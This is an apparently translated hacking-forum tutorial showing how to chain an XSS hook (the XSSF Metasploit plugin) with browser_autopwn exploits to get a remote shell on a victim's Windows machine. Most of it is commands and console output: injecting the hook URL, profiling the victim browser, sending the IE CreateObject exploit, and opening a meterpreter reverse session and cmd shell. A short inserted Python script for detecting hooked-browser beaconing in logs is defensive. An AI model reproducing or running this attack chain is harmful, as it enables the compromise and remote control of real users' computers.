Testing how XSS can be used to obtain system-level access on a target machine

author: RootkitHat.Org

It might look like showing off, but how else would you learn which operating system and browser your target is running?
A similar tool is available here: http://xss-proxy.sourceforge.net
Attachment: Path /sploits/2011/06/XSSF.zip
After unzipping, copy the whole contents of the attachment into /msf3/.
Start Metasploit, create the database, and load the plugin:

                 o                       8         o   o
                 8                       8             8
ooYoYo. .oPYo.  o8P .oPYo. .oPYo. .oPYo. 8 .oPYo. o8  o8P
8' 8  8 8oooo8   8  .oooo8 Yb..   8    8 8 8    8  8   8
8  8  8 8.       8  8    8   'Yb. 8    8 8 8    8  8   8
8  8  8 `Yooo'   8  `YooP8 `YooP' 8YooP' 8 `YooP'  8   8
..:..:..:.....:::..::.....::.....:8.....:..:.....::..::..:
::::::::::::::::::::::::::::::::::8:::::::::::::::::::::::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

       =[ metasploit v3.5.1-dev [core:3.5 api:1.0]
+ -- --=[ 635 exploits - 335 auxiliary
+ -- --=[ 215 payloads - 27 encoders - 8 nops
       =[ svn r11089 updated 239 days ago (2010.11.22)

Warning: This copy of the Metasploit Framework was last updated 239 days ago.
         We recommend that you update the framework at least every other day.
         For information on updating your copy of Metasploit, please see:

http://www.metasploit.com/redmine/projects/framework/wiki/Updating

msf > db_disconnect
msf > db_driver mysql
msf > db_connect root:[email protected]/xssftest
msf > load xssf

 __  __     ______     ______     ______
/\_\_\_\   /\  ___\   /\  ___\   /\  ___\
\/_/\_\/_  \ \___  \  \ \___  \  \ \  __\
  /\_\/\_\  \/\_____\  \/\_____\  \ \_\
  \/_/\/_/   \/_____/   \/_____/   \/_/     Cross-Site Scripting Framework
                                          Ludovic Courgnaud - CONIX Security

[+] Server started : http://192.168.56.101:8888/

[*] Please, inject 'http://192.168.56.101:8888/loop' resource in an XSS
[*] Successfully loaded plugin: XSSF

If the IP shown is not your external IP, edit /opt/metasploit3/msf3/plugins/xssf.rb and replace 0,0,0,0 with your external IP.
Then get the target machine to load "http://192.168.56.101:8888/loop" through the XSS.

View the XSS sessions

msf > xssf_victims

Victims
=======

id  xssf_server_id  active  ip            interval  browser_name       browser_version  cookie
--  --------------  ------  --            --------  ------------       ---------------  ------
1   1               true    192.168.56.1  2         Internet Explorer  6.0              YES

[*] Use xssf_information [VictimID] to see more information about a victim

An active value of true means the session can be used.
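From the defender's side, the victims table above shows the tell-tale behaviour of a hooked browser: the client fetches one resource (here /loop) every interval seconds for as long as the injected page stays open. The following added example, which is not part of the original post or of XSSF, flags that pattern in constructed web-proxy log lines; the log format, the thresholds and the sample entries are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Assumed (constructed) proxy log format: "<ISO timestamp> <client ip> <method> <url>"
LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+)$")


def parse_line(line):
    """Return (timestamp, client_ip, method, url) or None for unparsable lines."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ts, ip, method, url = m.groups()
    return datetime.fromisoformat(ts), ip, method, url


def find_beacons(lines, min_hits=5, max_jitter=0.5):
    """Return {(client_ip, url): mean_interval_seconds} for every client that
    requests the same URL at least min_hits times with nearly constant spacing
    (standard deviation of the gaps <= max_jitter seconds)."""
    hits = defaultdict(list)
    for line in lines:
        parsed = parse_line(line)
        if parsed:
            ts, ip, _method, url = parsed
            hits[(ip, url)].append(ts)
    beacons = {}
    for key, stamps in hits.items():
        if len(stamps) < min_hits:
            continue
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        if pstdev(gaps) <= max_jitter:
            beacons[key] = round(mean(gaps), 1)
    return beacons


# Constructed sample log: one client polls /loop every 2 s, another browses normally.
SAMPLE_LOG = """\
2011-07-19T23:30:25 192.168.56.1 GET http://192.168.56.101:8888/loop
2011-07-19T23:30:27 192.168.56.1 GET http://192.168.56.101:8888/loop
2011-07-19T23:30:29 192.168.56.1 GET http://192.168.56.101:8888/loop
2011-07-19T23:30:30 192.168.56.1 GET http://www.example.com/news.html
2011-07-19T23:30:31 192.168.56.1 GET http://192.168.56.101:8888/loop
2011-07-19T23:30:33 192.168.56.1 GET http://192.168.56.101:8888/loop
2011-07-19T23:30:35 192.168.56.1 GET http://192.168.56.101:8888/loop
2011-07-19T23:30:40 192.168.56.2 GET http://www.example.com/index.html
2011-07-19T23:31:02 192.168.56.2 GET http://www.example.com/index.html
2011-07-19T23:31:05 192.168.56.2 GET http://www.example.com/index.html
"""

if __name__ == "__main__":
    for (ip, url), interval in find_beacons(SAMPLE_LOG.splitlines()).items():
        print(f"possible hooked browser: {ip} polls {url} every {interval}s")
```

Real hooks are usually blocked earlier by a Content-Security-Policy that forbids inline script and restricts connect-src, so this check is a backstop for pages where such a policy is not yet in place.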

Connect to the XSS session

msf > xssf_information 1

INFORMATION ABOUT VICTIM 1
============================
IP ADDRESS      : 192.168.56.1
ACTIVE          : TRUE
FIRST REQUEST   : Tue Jul 19 23:30:25 UTC 2011
LAST REQUEST    : Tue Jul 19 23:31:17 UTC 2011
CONNECTION TIME : 52.0 seconds
BROWSER NAME    : Internet Explorer
BROWSER VERSION : 6.0
OS NAME         : Windows
OS VERSION      : XP
ARCHITECTURE    : ARCH_X86
LOCATION        : file:///C:/Documents and Settings/dis9team/桌面/xss.htm
COOKIES ?       : YES
RUNNING ATTACK  : NONE

How to obtain system privileges:

Use the Metasploit browser_autopwn module to set up a batch of browser exploits automatically. Note that its port must differ from the XSSF plugin's port.

msf > use auxiliary/server/browser_autopwn
msf auxiliary(browser_autopwn) > show options

Module options:

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   LHOST                        yes       The IP address to use for reverse-connect payloads
   SRVHOST     0.0.0.0          yes       The local host to listen on.
   SRVPORT     8080             yes       The local port to listen on.
   SSL         false            no        Negotiate SSL for incoming connections
   SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH                      no        The URI to use for this exploit (default is random)

msf auxiliary(browser_autopwn) > set LHOST 192.168.56.101
LHOST => 192.168.56.101
msf auxiliary(browser_autopwn) > set SRVHOST 192.168.56.101
SRVHOST => 192.168.56.101
msf auxiliary(browser_autopwn) > set SRVPORT 8081
SRVPORT => 8081
msf auxiliary(browser_autopwn) > exploit
[*] Auxiliary module execution completed

[*] Starting exploit modules on host 192.168.56.101...
[*] ---

[*] Starting exploit multi/browser/firefox_escape_retval with payload generic/shell_reverse_tcp
[*] Using URL: http://192.168.56.101:8081/QlQp2UFx8EADO
[*] Server started.
msf auxiliary(browser_autopwn) > [*] Starting exploit multi/browser/java_calendar_deserialize with payload java/meterpreter/reverse_tcp
[*] Using URL: http://192.168.56.101:8081/pqDNRyLmHuA
[*] Server started.
[*] Starting exploit multi/browser/java_trusted_chain with payload java/meterpreter/reverse_tcp
[*] Using URL: http://192.168.56.101:8081/kXVd9wNJ7
[*] Server started.
[*] Starting exploit multi/browser/mozilla_compareto with payload generic/shell_reverse_tcp
[*] Using URL: http://192.168.56.101:8081/zNNqGn8p
[*] Server started.
[*] Starting exploit multi/browser/mozilla_navigatorjava with payload generic/shell_reverse_tcp
[*] Using URL: http://192.168.56.101:8081/nZqqJnbK17P2Uu
[*] Server started.
[*] Starting exploit multi/browser/opera_configoverwrite with payload generic/shell_reverse_tcp
[*] Using URL: http://192.168.56.101:8081/l45IFo
[*] Server started.
[*] Starting exploit multi/browser/opera_historysearch with payload generic/shell_reverse_tcp
[*] Using URL: http://192.168.56.101:8081/4uYjQ9Cd
[*] Server started.
[*] Starting exploit osx/browser/safari_metadata_archive with payload generic/shell_reverse_tcp
[*] Using URL: http://192.168.56.101:8081/jUnB2WdlVh
[*] Server started.
[*] Starting exploit windows/browser/apple_quicktime_marshaled_punk with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://192.168.56.101:8081/w3xxrTDcW1D
[*] Server started.
[*] Starting exploit windows/browser/apple_quicktime_rtsp with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://192.168.56.101:8081/nf21OPGpG4
[*] Server started.
[*] Starting exploit windows/browser/apple_quicktime_smil_debug with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://192.168.56.101:8081/C7HBuD
[*] Server started.
[*] Starting exploit windows/browser/ie_createobject with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://192.168.56.101:8081/GpI7DbKJ2wp5kS
[*] Server started.
[*] Starting exploit windows/browser/java_basicservice_impl with payload windows/meterpreter/reverse_tcp
[-] Exploit failed: windows/meterpreter/reverse_tcp is not a compatible payload.
[-] Failed to start exploit module windows/browser/java_basicservice_impl
[*] Starting exploit windows/browser/ms03_020_ie_objecttype with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://192.168.56.101:8081/xFm6pSwb
[*] Server started.
[*] Starting exploit windows/browser/ms10_018_ie_behaviors with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://192.168.56.101:8081/yVJcsYOtv
[*] Server started.
[*] Starting exploit windows/browser/ms10_xxx_ie_css_clip with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://192.168.56.101:8081/JaT9yvjsEik
[*] Server started.
[*] Starting exploit windows/browser/winzip_fileview with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://192.168.56.101:8081/1t4f8o9
[*] Server started.
[*] Starting handler for windows/meterpreter/reverse_tcp on port 3333
[*] Starting handler for generic/shell_reverse_tcp on port 6666
[*] Started reverse handler on 192.168.56.101:3333
[*] Starting handler for java/meterpreter/reverse_tcp on port 7777
[*] Started reverse handler on 192.168.56.101:6666
[*] Starting the payload handler...
[*] Starting the payload handler...
[*] Started reverse handler on 192.168.56.101:7777
[*] Starting the payload handler...

[*] --- Done, found 16 exploit modules

[*] Using URL: http://192.168.56.101:8081/Xy5LvGuPst
[*] Server started.

List the exploits that are available:

msf auxiliary(browser_autopwn) > jobs

Jobs
====

  Id  Name
  --  ----
  0   Auxiliary: server/browser_autopwn
  1   Exploit: multi/browser/firefox_escape_retval
  2   Exploit: multi/browser/java_calendar_deserialize
  3   Exploit: multi/browser/java_trusted_chain
  4   Exploit: multi/browser/mozilla_compareto
  5   Exploit: multi/browser/mozilla_navigatorjava
  6   Exploit: multi/browser/opera_configoverwrite
  7   Exploit: multi/browser/opera_historysearch
  8   Exploit: osx/browser/safari_metadata_archive
  9   Exploit: windows/browser/apple_quicktime_marshaled_punk
  10  Exploit: windows/browser/apple_quicktime_rtsp
  11  Exploit: windows/browser/apple_quicktime_smil_debug
  12  Exploit: windows/browser/ie_createobject
  13  Exploit: windows/browser/ms03_020_ie_objecttype
  14  Exploit: windows/browser/ms10_018_ie_behaviors
  15  Exploit: windows/browser/ms10_xxx_ie_css_clip
  16  Exploit: windows/browser/winzip_fileview
  17  Exploit: multi/handler
  18  Exploit: multi/handler
  19  Exploit: multi/handler

Choose the exploit module that matches the target's operating system:

xssf_exploit 1 12: the first number is the XSS session (victim ID), the second is the job ID of the browser exploit.

msf auxiliary(browser_autopwn) > xssf_exploit 1 12
[*] Searching Metasploit launched module with JobID = '12'...
[+] A running exploit exists : 'Exploit: windows/browser/ie_createobject'
[*] Exploit execution started, press [CTRL + C] to stop it !

[*] Sending Internet Explorer COM CreateObject Code Execution exploit HTML to 192.168.56.101:44018...

[+] Code 'Exploit: windows/browser/ie_createobject' sent to victim '4'
[+] Remaining victims to attack : NONE
[*] Sending Internet Explorer COM CreateObject Code Execution exploit HTML to 192.168.56.101:51709...
[*] Sending EXE payload to 192.168.56.101:60903...
[*] Sending stage (749056 bytes) to 192.168.56.1
[*] Meterpreter session 1 opened (192.168.56.101:3333 -> 192.168.56.1:37151) at Tue Jul 19 23:42:03 -0400 2011
[*] Session ID 1 (192.168.56.101:3333 -> 192.168.56.1:37151) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: njoFrATVcA.exe (1728)
[*] Spawning a notepad.exe host process...
[*] Migrating into process ID 1092
[*] New server process: notepad.exe (1092)

^C[-] Exploit interrupted by the console user
msf auxiliary(browser_autopwn) > sessions

Active sessions
===============

  Id  Type                   Information                                 Connection
  --  ----                   -----------                                 ----------
  1   meterpreter x86/win32  DIS9TEAM-7A9CFB\dis9team @ DIS9TEAM-7A9CFB  192.168.56.101:3333 -> 192.168.56.1:37151

msf auxiliary(browser_autopwn) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > shell
Process 5504 created.
Channel 1 created.
Microsoft Windows XP [版本 5.1.2600]
(C) 版權所有 1985-2001 Microsoft Corp.

C:\Documents and Settings\dis9team\桌面>

Done.
